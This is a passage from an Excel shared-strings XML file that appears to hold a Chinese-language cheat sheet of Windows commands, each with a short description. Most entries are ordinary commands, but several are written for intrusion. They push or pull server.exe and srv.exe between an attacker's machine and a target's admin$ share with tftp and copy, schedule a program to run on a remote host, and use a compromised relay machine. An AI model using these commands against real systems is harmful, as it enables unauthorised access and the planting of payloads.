        <charset val="134"/>
      </rPr>
      <t>和</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">"&gt; &gt;" </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>是重定向命令</t>
    </r>
  </si>
  <si>
    <r>
      <t>at id</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>号</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开启已注册的某个计划任务</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">at /delete </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>停止所有计划任务，用参数</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>/yes</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>则不需要确认就直接停止</t>
    </r>
  </si>
  <si>
    <r>
      <t>at id</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>号</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> /delete </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>停止某个已注册的计划任务</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">at \\ip time </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>程序名</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>或一个命令</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">) /r </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>在某时间运行对方某程序并重新启动计算机</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">finger username @host </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>查看最近有哪些用户登陆</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">telnet ip </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端口</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>远和登陆服务器</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>默认端口为</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>23</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">open ip </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接到</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>（属</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>telnet</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>登陆后的命令）</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">telnet </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>在本机上直接键入</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">telnet </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>将进入本机的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>telnet</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">copy </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>路径</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>\</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>文件名</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">1 </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>路径</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>\</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>文件名</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">2 /y </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>复制文件</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>到指定的目录为文件</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，用参数</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>/y</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>就同时取消确认你要改写一份现存目录文件</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">copy c:\srv.exe $"&gt;\\ip\admin$ </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>复制本地</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>c:\srv.exe</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>到对方的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>admin</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">cppy 1st.jpg/b+2st.txt/a 3st.jpg </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>将</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>2st.txt</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的内容藏身到</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>1st.jpg</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中生成</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>3st.jpg</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>新的文件，注：</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>2st.txt</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>文件头要空三排，参数：</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>/b</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>指二进制文件，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>/a</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>指</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ASCLL</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>格式文件</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">copy $\svv.exe"&gt;\\ip\admin$\svv.exe c:\ </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>或</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">:copy\\ip\admin$\*.* </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>复制对方</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>admini$</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>共享下的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>srv.exe</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>文件（所有文件）至本地</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>C</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>：</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">xcopy </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>要复制的文件或目录树</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>目标地址</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>\</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>目录名复制文件和目录树，用参数</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>/Y</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>将不提示覆盖相同文件</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">tftp -i </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自己</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP(</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>用肉机作跳板时这用肉机</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">IP) get server.exe c:\server.exe </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>登陆后，将“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>server.exe</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下载到目标主机</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">c:\server.exe </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>参数：</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>-i</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>指以二进制模式传送，如传送</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>exe</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>文件时用，如不加</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">-i </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>则以</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ASCII</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>模式（传送文本文件模式）进行传送</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">tftp -i </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>对方</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">IP put c:\server.exe </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>登陆后，上传本地</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>c:\server.exe</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>至主机</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">ftp ip </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端口用于上传文件至服务器或进行文件操作，默认端口为</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>21</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>。</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>bin</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>指用二进制方式传送（可执行文件进）；默认为</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ASCII</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>格式传送</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>文本文件时</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>)</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">route print </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>显示出</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>路由，将主要显示网络地址</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Network addres</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，子网掩码</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Netmask</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，网关地址</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Gateway addres</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，接口地址</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Interface</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">arp </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>查看和处理</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ARP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缓存，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ARP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>是名字解析的意思，负责把一个</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>解析成一个物理性的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>MAC</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地址。</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>arp -a</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>将显示出全部信息</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">start </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>程序名或命令</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> /max </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>或</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">/min </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>新开一个新窗口并最大化（最小化）运行某程序或命令</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">mem </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>查看</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>cpu</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>使用情况</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">attrib </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>文件名</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>目录名</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">) </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>查看某文件（目录）的属性</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">attrib </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
